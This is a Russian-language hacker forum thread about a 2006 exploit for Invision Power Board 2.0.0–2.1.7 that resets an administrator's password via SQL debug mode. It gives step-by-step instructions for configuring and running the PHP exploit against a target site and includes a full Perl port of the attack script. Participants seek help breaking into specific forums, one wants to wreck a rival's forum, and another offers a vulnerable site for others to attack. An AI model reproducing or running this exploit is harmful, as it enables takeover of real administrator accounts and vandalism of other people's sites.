Наконецто %) бьет версии от 2.0.0 до 2.1.7 , если Debug Level на уровне тройки ( вроде по умолчанию )

Написан на php и требует библиотеку curl , существующего юзера с правильным пассом

http://milw0rm.com/exploits/2696

смущает Enable SQL Debug Mode is turned on

$ADMIN->html .= $SKIN->add_td_row( array( "<b><i>ENABLE</I> SQL Debug Mode?</b><br>(If yes, add '&debug=1' to any page to view mySQL debug info)" ,
$SKIN->form_yes_no( "sql_debug", $INFO['sql_debug'] )
выдержка из кода админки ) т.е. мы должны запрос чтоли видеть ? ) или я не втыкаю что-то в эту тему

Для успешной информаций форум должен быть в режиме Debug точнее должна быть включена эта опция в админке !

ЗЫ) тестил! прошло на ура! Вот только надо было найти форум в режими Debug было не просто!

blackybr
Че это за режим такой ни фига не пойму где его в админке включить?

Подскажите как вообще заюзать его?подскажите пожалуйста!

SQL Debug Mode не стоит по дефолту.. пытался найти все форумы с включенным модом.. дык они все в дауне либо задэфины.. смешно..)

вообще включать этот мод админы ипб рекомендуют только при обстоятельствах которые напрямую его требуют..

Включить так:
Настройки - Глобальные Настройки форума - Включить режим отладки SQL?

Сплойт хороший, но этот режим не стоит по дефолту.
Может оно и к лучшему :)

Юзать так: кидаешь сплойт на любой хостинг, редактируешь его, $site = "" полный путь к сайту включая индекс файл, $name = "" ник админа, $pass ="" любой пасс, потом просто запускаешь этот сплойт с хостинга и пароль админа меняется на тобой выбранный.
Error: Probably not vulnerable, or no forum found - значит либо неправильный путь, либо не включена опция отладки, и соответственно сплойт не сработает.
Надпись # milw0rm.com [2006-11-01] означает что введен несуществующий ник, Password Changed! - все прошло успешно, можно заходить под ником админа с новым, выбранным тобой паролем.

p.s проверить включена ли опция отладки на форуме можно так:
Добавить в адресной строке в конец любой ссылки &debug=1 , если появится информация с заголовком sql debugger значит опция включена, если ничего не произойдет значит выключена, и форум не уязвим по этому сплойту :)

нарооод кто нить помогите разобраться по пунтктиком! =(

Fatal error: Call to undefined function: curl_init() in /home/***/*/*/*/***/public_html/exploits/ipb217.php on line 37

Странновато ...

ЗЫ) тестил! прошло на ура! Вот только надо было найти форум в режими Debug было не просто!
Ты его на локалке наверно нашел :D

Fatal error: Call to undefined function: curl_init() in /home/***/*/*/*/***/public_html/exploits/ipb217.php on line 37

Странновато ...

На хосте где его пробуешь Curl вырублен, или сплоит не может определить его.

ни одного форума не нашел ЛОЛ
лучше уж через аватарку заюзать.

опасный сплоит
работает тока где наити такие форумы
они правда или в дауне или задефейсены

Fatal error: Call to undefined function: curl_init() in /home/***/*/*/*/***/public_html/exploits/ipb217.php on line 37

Странновато ...
Ничего странного, просто php нужно собрать с поддержкой curl :)
Вообщем если хост не твой, то поищи другой, если в linux пересобрать с курлом, как в виндовсе прикрутить не имею понятия :) наверное по дефолту используется...

offtopic
ваще не реально найти сайты такие!

да согласен нашел токо 1 на этом остановился...
как я понял восновном это отдельне тачки... не хостинги.

Объясните как cURL.dll к PHP прикрутить? Ось - WinXP...
Гуглу покопал, поправил следущее:

Копируем libeay32.dll и ssleay32.dll Из вашей папки PHP в c:\windows\system32
Редактим extensions_dir в php..ini на "d:\apps\php\extensions" (смотрете где у вас лежит php_curl.dll)
Раскомменчиваем в php.ini extension=php_curl.dll
рестарт апача...

Щас работает.

Вот если бы сплоит вышел на Perl было бы другое дело)) но за то что выложил хоть какой то сплоит сплоит автору +2)

_GaLs_ прав как никогда.
Выложите плиз на PERL этот сплоит!

Вовремя рст ушли со сцены.
Все возможные и невозможные критические баги в phpbb и ipb видимо уже найдены.

думаю сцена переживает некий переломный момент, либо в скором времени появиться команда которая с новой силой будет находить баги и выпускать интересные релизы, либо хак уйдет в полный андеграунд. ИМХО сейчас хак является попсовой вещью.

Интересно посмотреть, что будет через год или более.

Вовремя рст ушли со сцены.
Все возможные и невозможные критические баги в phpbb и ipb видимо уже найдены.
Я не удивлюсь если скоро появится новый двиг форума и новая команда которая будет выкладывать баги к нему ;)

HELP:

Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:

1. Качаем http://limpompo.jino-net.ru/php_curl.rar
2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\
3. Копируем php_curl.dll в диру [you_apache_dir]\php\extensions
4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll
5. Перезагрузи Апачу!
6. Уря =) Работает... ыыыыыы

С Уважением limpompo.

Плиз помогите ЛАМУ как вообще пользоватся Php скриптами? Дайте хоть ссылку на видео плиз или опишите как их использовать.

З.Ы. буду очень признателен

Вот прочитай:

http://forum.antichat.ru/thread26510.html

сплоиту нужен php_curl.dll, как его прикрутить к php смотри выше...

ок спс большое

А почему когда запускаешь сплойт появляется пустое окно?

Вот если бы сплоит вышел на Perl было бы другое дело))
Выложите плиз на PERL этот сплоит!
На всяк пожарный выложу: (тока я его не тестил!!!)

#!perl -w

use strict;
use LWP::UserAgent;

my $target="http://127.0.0.1/board/index.php"; # victim
my $name="hax0r"; # existing user
my $pass="31337"; # password to set
my $proxy=""; # optional: http proxy

my($prefix,$suffix,$regid,$regcode);
my $ua=LWP::UserAgent->new();
$ua->proxy("http",$proxy) if($proxy);
my $response=$ua->get($target."?act=Reg&CODE=10");
if($response->is_success)
{
if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>(.+?)_reg_antispam<\/span> \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32}?)\',(.+?),/im)
{
$prefix=$1;
$regid=$2;
$regcode=$3;
}
else
{
$suffix="&debug=1";
$response=$ua->get($target."?act=Reg&CODE=10".$suffix);
if($response->is_success)
{
if($response->content=~/INSERT INTO (.+?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32})\',(.+?),/im)
{
$prefix=$1;
$regid=$2;
$regcode=$3;
}
else { exit print "\nExploit failed!\n" }
}
else { exit print "\nExploit failed!\n" }
}
}
else { exit print "\nExploit failed!\n" }
$target=$target.$suffix if($suffix);
$response=$ua->post($target,[act=>"Reg",
CODE=>11,
member_name=>$name,
regid=>$regid,
reg_code=>$regcode]);
if($response->is_success)
{
if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \(vid,member_id,real_group,temp_group,entry_date,c oppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
{ changePass($regcode,$regid,$1,$2) }
elsif($response->content=~/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,c oppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
{ changePass($regcode,$regid,$1,$2) }
else { exit print "\nExploit failed!\n" }
}
else { print "\nExploit failed!\n" }

sub changePass
{
my($regcode,$regid,$vid,$userid)=@_;
my $ua=LWP::UserAgent->new();
$ua->proxy("http",$proxy) if($proxy);
my $response=$ua->post($target,[act=>"Reg",
CODE=>03,
type=>"lostpass",
uid=>$userid,
aid=>$vid,
regid=>$regid,
reg_code=>$regcode,
pass1=>$pass,
pass2=>$pass]);
if($response->is_success) { exit print "\nExploited!\n" }
else { exit print "\nExploit failed!\n" }
}

C:\Documents and Settings\Bart>C:\Downloads\ipb217.pl

Exploit failed!

Ну failed - значит, failed, значит, форум патченный. Чеж ты хочешь то тогда :)

Есть какой нить способ что бы ломать не лишь бы что,а интересуют пара конкретных форумов...чет через аваторки не прокатывает (или подскажите как заставить админа посмотреть) видимо с СИ плохо ((( а Xss не разбираюсь(((

а Xss не разбираюсь(((
а кто тебе мешает? разберись

Блин, Лимпопо, наф ты удалил файло, чтоб модуль поставить? =( Дайте плз в ПМ этот архивец! =(

Блин, Лимпопо, наф ты удалил файло, чтоб модуль поставить? =( Дайте плз в ПМ этот архивец! =(


Нечайно =)

limpompo, можешь в ПМ кинуть архив, или ссылку плз? А то чувствую, так и не дождусь я от юзеров такого подарка Х_х Ибо срочно надо, форум падонка грохнуть. А из-за его отсталости я его уговорил врубить эту функцию :D

Fr-Ron - нету у меня уже Архива... Так что придётся подождать у кого остался Архивчик

Вот выложил megabitshack.narod.ru/php_curl.rar

Пользы от этого сплойта только посмотреть как с cURL работать на PHP и всё, а найти уязвимый этому форум просто палево.

Kp0t
Я знаю уязвимый форум, токо он на бесплатном хосте... Там админ му**к еще тот.
Если хочешь душу на этом форуме отвести, в личку стукни ;)


HiM@S:Closed хватить флудить,всё что надо для работы сплойта в теме описано .